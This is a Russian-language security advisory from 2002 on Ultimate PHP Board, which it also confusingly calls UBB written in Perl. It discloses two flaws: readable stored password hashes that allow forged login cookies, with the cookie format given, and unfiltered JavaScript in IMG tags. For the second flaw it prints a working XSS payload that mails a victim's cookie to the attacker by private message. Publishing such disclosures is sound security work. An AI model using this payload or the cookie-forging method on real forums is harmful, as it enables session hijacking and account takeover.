Дата публикации: | 29.04.2002 |
Всего просмотров: | 1824 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | UBB (Ultimate Bulletin Board) - программное обеспечение Web форумов, написанное в Perl.
Зашифрованные UPB пароли пользователя включены в файлы, которые могут быть доступны любому пользователю. 1. Злонамеренный пользователь может создавать куки, используя зашифрованный пароль зарегистрированного UPB пользователя и получать доступ к его учетной записи. Данные UPB cookie используют следующий формат: ID + 'þ' + 'Xb' + 'encrypted user password' 2. UBB не в состоянии фильтровать Javascript код, внутри тэга IMG. Уязвимость позволяет злонамеренному пользователю перехватывать опознавательные мандаты другого пользователя, основанные на cookie. [img]javascript:window.open('index.php?upb=pm&mode=send&send=yes&target_id=MY-ID&betreff=cookie&pm='+document.cookie+'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-ID&check=yes')[/img] Уязвимость обнаружена в X-Crew Ultimate PHP Board 1.0 Beta-1.1 |
Ссылки: | Security holes : Ultimate PHP Board |